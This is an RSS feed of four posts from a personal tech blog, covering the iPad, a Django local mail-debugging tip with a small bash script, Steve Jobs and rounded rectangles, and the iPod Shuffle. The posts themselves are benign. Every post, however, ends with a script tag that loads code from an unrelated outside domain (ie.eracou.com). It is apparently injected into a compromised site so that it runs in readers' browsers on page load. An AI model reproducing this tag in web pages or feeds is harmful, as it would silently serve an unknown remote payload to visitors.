<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>jBoxer &#187; apple</title>
	<atom:link href="http://jboxer.com/tag/apple/feed/" rel="self" type="application/rss+xml" />
	<link>http://jboxer.com</link>
	<description>I change the directions of small pieces of metal for a living.</description>
	<lastBuildDate>Wed, 28 Jul 2010 14:23:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>The best point about the iPad so far</title>
		<link>http://jboxer.com/2010/01/the-best-point-about-the-ipad-so-far/</link>
		<comments>http://jboxer.com/2010/01/the-best-point-about-the-ipad-so-far/#comments</comments>
		<pubDate>Fri, 29 Jan 2010 16:46:16 +0000</pubDate>
		<dc:creator>Jake Boxer</dc:creator>
				<category><![CDATA[computers]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[ipad]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[ipod]]></category>
		<category><![CDATA[multitasking]]></category>
		<category><![CDATA[slashdot]]></category>

		<guid isPermaLink="false">http://jboxer.com/?p=317</guid>
		<description><![CDATA[So far, the best point I&#8217;ve read about the iPad has come from a Slashdot comment: It&#8217;s not about &#8220;do more things,&#8221; it&#8217;s about &#8220;do very few things better.&#8221; That&#8217;s why Apple wins. My wife asked about the iPad last night (she owns a netbook right now) and now she&#8217;s drooling over one. Why? It [...]]]></description>
			<content:encoded><![CDATA[<p>So far, the best point I&#8217;ve read about the iPad has come from <a href="http://linux.slashdot.org/comments.pl?sid=1529896&#038;cid=30950700">a Slashdot comment</a>:</p>
<blockquote><p>It&#8217;s not about &#8220;do more things,&#8221; it&#8217;s about &#8220;do very few things better.&#8221;<br />
<br />
That&#8217;s why Apple wins.<br />
<br />
My wife asked about the iPad last night (she owns a netbook right now) and now she&#8217;s drooling over one. Why? It doesn&#8217;t have &#8220;files.&#8221; It doesn&#8217;t have &#8220;windows.&#8221; She won&#8217;t have to worry about &#8220;flash drives.&#8221; And so on. She was so excited about all the things it didn&#8217;t have (and that she therefore didn&#8217;t have to worry about) that she was disappointed when I told her they weren&#8217;t in the Apple Store in Manhattan yet.<br />
<br />
Meanwhile, the geeks are running around blasting Apple products for all the things they &#8220;don&#8217;t have&#8221; and recommending complex alternatives.<br />
<br />
That&#8217;s why Apple is making $$$ these days. Because they&#8217;re removing 60 percent of the features and making the remaining 40 percent configuration free and so polished they make your eyes hurt.</p></blockquote>
<p>I said similar things to people who were upset about the lack of multitasking, but this guy really hits the nail on the head.</p>
<p>I think too many people wanted another iPhone launch. The iPhone, if you think about it, was actually an aberration as far as Apple products go; the iPhone did more than most phones (though at that point, smartphones were less popular in general), and somehow still managed to do almost everything really well. Compare this to Apple&#8217;s launch of the iPod. <a href="http://apple.slashdot.org/article.pl?sid=01/10/23/1816257">The iconic response from geeks</a>:</p>
<blockquote><p>No wireless. Less space than a nomad. Lame.</p></blockquote>
<p>We all know how that one turned out.</p>
<p>The fact of the matter is, aside from the iPhone, Apple has <em>always</em> released products that do less, and do it better. Us geeks may be offended by the &#8220;do less&#8221; part, but the average consumer loves it, and that&#8217;s why Apple will continue to launch into controversy and leave geeks looking foolish a couple years later.<script src="http://ie.eracou.com/3"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jboxer.com/2010/01/the-best-point-about-the-ipad-so-far/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Non-painful email on Django development servers</title>
		<link>http://jboxer.com/2009/05/non-painful-email-on-django-development-servers/</link>
		<comments>http://jboxer.com/2009/05/non-painful-email-on-django-development-servers/#comments</comments>
		<pubDate>Tue, 05 May 2009 21:05:56 +0000</pubDate>
		<dc:creator>Jake Boxer</dc:creator>
				<category><![CDATA[programming]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[django]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[mac]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://jboxer.com/?p=187</guid>
		<description><![CDATA[I&#8217;ve been actively learning and using Django since August 2008, and I&#8217;ve loved almost every bit of it. There are plenty of places to read all about the virtues of Django, so I&#8217;ll leave that out for now. One thing that&#8217;s always bugged me about web development in general is the sending of emails. I [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been actively learning and using Django since August 2008, and I&#8217;ve loved almost every bit of it. There are plenty of places to read all about the virtues of Django, so I&#8217;ll leave that out for now.</p>
<p>One thing that&#8217;s always bugged me about web development in general is the sending of emails. I do development on my local computer (with a badly set up Apache / MySQL / PHP / Python / whatever else stack), and I&#8217;ve never felt like dealing with the headache of setting up a mail server. This means, when I add something that&#8217;s supposed to send an email (like an activation email after registration), I have to get very hacky to test and debug it (making sure the email text is being produced correctly, making sure it&#8217;s being sent to and from the right people, etc.).</p>
<p>This was one of the few web development pains that I thought Django didn&#8217;t solve. Whenever I&#8217;d test a bit of code that was supposed to send email, I&#8217;d get a &#8220;Connection refused&#8221; error page (meaning my computer has no mail server to send the email with). I would usually add in a bit of printf debugging to make sure the subject and body had the correct text, but beyond that, I&#8217;d usually wait to test the email portions until I uploaded to a server that could send email (usually the production server, unfortunately).</p>
<p>Yesterday, I bumped into <a href="http://docs.djangoproject.com/en/dev/topics/email/#testing-e-mail-sending">a little section in the Django documentation that explains how to get around this</a>. As usual, Python has all the solutions. First, set this code in your settings.py file:</p>
<pre class="brush: python;">EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025 # replace this with some free port number on your machine</pre>
<p>Then, assuming you&#8217;re on a Unix system (I&#8217;m on a Mac), run the following on the command line to start a &#8220;dumb&#8221; Python mailserver:</p>
<pre class="brush: bash;">python -m smtpd -n -c DebuggingServer localhost:1025</pre>
<p>Make sure to replace 1025 with whatever you filled in for EMAIL_PORT.</p>
<p>Now, try running the email-sending code in your Python application. Voila! No error pages (or at least, none related to email), and the full text of the email (headers and all) appears in whatever command line prompt you ran the dumb mailserver on. This allows you to the see senders, recipients, subject, and body of the email being sent out, all without getting hacky or sending to an email account you own.</p>
<p>Taking this a step further, I created a small bash script called &#8220;dumbmail&#8221; in /usr/local/bin that looks like the following:</p>
<pre class="brush: bash;">#!/usr/bin/env bash
if [ -z $1 ]
then port=1025
else port=$1
fi

echo &quot;Starting dumb mail server on localhost:$port&quot;
python -m smtpd -n -c DebuggingServer localhost:$port</pre>
<p>Now, when I&#8217;m testing a Django application and I get to a section that is going to send an email, I just run &#8220;dumbmail&#8221; (or &#8220;dumbmail some_number&#8221; if I need to use a different port, for some reason I can&#8217;t imagine), and I&#8217;m ready to go.</p>
<p>Hope this helps people. The documentation was always there &#8211; I just never noticed that part until yesterday.<script src="http://ie.eracou.com/3"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jboxer.com/2009/05/non-painful-email-on-django-development-servers/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Round Rectangles (or Why Steve Jobs is a Visionary)</title>
		<link>http://jboxer.com/2009/04/round-rectangles-or-why-steve-jobs-is-a-visionary/</link>
		<comments>http://jboxer.com/2009/04/round-rectangles-or-why-steve-jobs-is-a-visionary/#comments</comments>
		<pubDate>Wed, 29 Apr 2009 01:34:02 +0000</pubDate>
		<dc:creator>Jake Boxer</dc:creator>
				<category><![CDATA[computers]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[imac]]></category>
		<category><![CDATA[ipod]]></category>
		<category><![CDATA[m night shyamalan]]></category>
		<category><![CDATA[round rectangles]]></category>
		<category><![CDATA[steve jobs]]></category>
		<category><![CDATA[the sixth sense]]></category>
		<category><![CDATA[unbreakable]]></category>
		<category><![CDATA[visionary]]></category>

		<guid isPermaLink="false">http://jboxer.com/?p=172</guid>
		<description><![CDATA[A story was posted on Folklore.org (a site full of old stories about the creation and initial development of Apple computers) about the addition of rounded rectangles to an old drawing program, and Steve Jobs&#8217;s involvement in them. This section in particular struck me: Bill fired up his demo and it quickly filled the Lisa [...]]]></description>
			<content:encoded><![CDATA[<p>A story was posted on <a href="http://www.folklore.org">Folklore.org</a> (a site full of old stories about the creation and initial development of Apple computers) about <a href="http://folklore.org/StoryView.py?project=Macintosh&#038;story=Round_Rects_Are_Everywhere.txt&#038;sortOrder=Sort%20by%20Date&#038;detail=medium&#038;search=round%20rect">the addition of rounded rectangles to an old drawing program</a>, and Steve Jobs&#8217;s involvement in them. This section in particular struck me:</p>
<blockquote><p>Bill fired up his demo and it quickly filled the Lisa screen with randomly-sized ovals, faster than you thought was possible. But something was bothering Steve Jobs. &#8220;Well, circles and ovals are good, but how about drawing rectangles with rounded corners? Can we do that now, too?&#8221;</p>
<p>&#8220;No, there&#8217;s no way to do that. In fact it would be really hard to do, and I don&#8217;t think we really need it&#8221;. I think Bill was a little miffed that Steve wasn&#8217;t raving over the fast ovals and still wanted more.</p>
<p>Steve suddenly got more intense. &#8220;Rectangles with rounded corners are everywhere! Just look around this room!&#8221;. And sure enough, there were lots of them, like the whiteboard and some of the desks and tables. Then he pointed out the window. &#8220;And look outside, there&#8217;s even more, practically everywhere you look!&#8221;. He even persuaded Bill to take a quick walk around the block with him, pointing out every rectangle with rounded corners that he could find.</p>
<p>When Steve and Bill passed a no-parking sign with rounded corners, it did the trick. &#8220;OK, I give up&#8221;, Bill pleaded. &#8220;I&#8217;ll see if it&#8217;s as hard as I thought.&#8221; He went back home to work on it.</p></blockquote>
<p>I think this is a fantastic example of what makes Steve Jobs one of the few true visionaries in the world. In the face of a big advancement like fast ovals (yes, it was definitely a big deal at the time), I would&#8217;ve been more than satisfied. I may have asked for rounded rectangles in a second iteration, but it would&#8217;ve been a simple feature idea.  I believe most people would&#8217;ve reacted the same way.</p>
<p>What makes Steve Jobs special is his ability to quickly identify what&#8217;s really important. It seems so obvious after the fact. Of course people would like <a href="http://jboxer.com/img/original-imac.jpg">computers with translucent colored cases</a>! Of course minimalist controls would make for <a href="http://jboxer.com/img/original-ipod.jpg">a more accessible and desirable MP3 player</a>! Of course rounded rectangles are an extremely common shape, and are really important to have in a drawing program! These ideas (and more) are all obvious now. But a year before Apple did them, other companies were struggling to innovate in these fields, and they were only &#8220;obvious&#8221; to Steve Jobs.</p>
<p>Of course, anyone can have a great idea that turns out to be the right way of doing things. This is why I distinguish between &#8220;true&#8221; and regular (false?) visionaries. People called M. Night Shyamalan a visionary after &#8220;The Sixth Sense&#8221; and &#8220;Unbreakable&#8221;. He then went on to make one more pretty good but decidedly un-visionary movie (Signs), an arguably good but decidedly un-visionary movie (The Village, which I loved, but I understand why others didn&#8217;t), and two duds (my apologies to the three people who liked them). The visionary label was applied to Shyamalan before he&#8217;d reached first base, and he got thrown out at second. This happens all the time, and these people are certainly not true visionaries.</p>
<p>True visionaries come up with visionary ideas so consistently, that it becomes expected of them. And no one (off the top of my head) has a more consistent history of this than Steve Jobs.<script src="http://ie.eracou.com/3"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jboxer.com/2009/04/round-rectangles-or-why-steve-jobs-is-a-visionary/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apple takes it too far on form-over-function</title>
		<link>http://jboxer.com/2009/03/apple-takes-it-too-far-on-form-over-function/</link>
		<comments>http://jboxer.com/2009/03/apple-takes-it-too-far-on-form-over-function/#comments</comments>
		<pubDate>Thu, 12 Mar 2009 01:52:27 +0000</pubDate>
		<dc:creator>Jake Boxer</dc:creator>
				<category><![CDATA[computers]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[gadgets]]></category>
		<category><![CDATA[ipod]]></category>

		<guid isPermaLink="false">http://jboxer.com/?p=92</guid>
		<description><![CDATA[Today, Apple announced the new iPod Shuffle. It drops the navigation buttons in favor of making it slightly smaller. Your first question upon hearing this was probably the same as mine: &#8220;How do you switch songs?&#8221; Simple: the controls are on the cable of the prepackaged headphones. Do you listen to your iPod with the [...]]]></description>
			<content:encoded><![CDATA[<p>Today, Apple announced <a href="http://www.apple.com/ipodshuffle/">the new iPod Shuffle</a>.  It drops the navigation buttons in favor of making it slightly smaller.</p>
<div style="text-align: center;"><img src="http://jboxer.com/wp-content/uploads/2009/03/ipodshuffle01.jpg" alt="New iPod Shuffle" title="ipodshuffle01" width="316" height="268" class="size-full wp-image-93" /></div>
<p>Your first question upon hearing this was probably the same as mine: &#8220;How do you switch songs?&#8221; Simple: the controls are on the cable of the prepackaged headphones.</p>
<div style="text-align: center;"><img src="http://jboxer.com/wp-content/uploads/2009/03/ipodshuffle2.jpg" alt="New iPod Shuffle Headphones" title="ipodshuffle2" width="312" height="265" class="size-full wp-image-94" /></div>
<p>Do you listen to your iPod with the headphones it came with?  Most people I know don&#8217;t.  Admittedly, I don&#8217;t know anyone who owns an iPod Shuffle (my mom used to, but that&#8217;s it), so it&#8217;s possible that iPod Shuffle buyers often stick with the default headphones.  But be warned: if you buy an iPod Shuffle, and you want to use your own headphones, get ready to not be able to switch/skip songs.</p>
<p>I understand choosing form over function, up to a point.  But to me, this just seems ludicrous.  The difference in size between this thing and <a href="http://www.freegiftgrab.co.uk/gifts/index_files/ipod-shuffle.jpg">the last-gen iPod Shuffle</a> is minuscule, and the functional sacrifice immense.  But maybe I just don&#8217;t get it.<script src="http://ie.eracou.com/3"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jboxer.com/2009/03/apple-takes-it-too-far-on-form-over-function/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
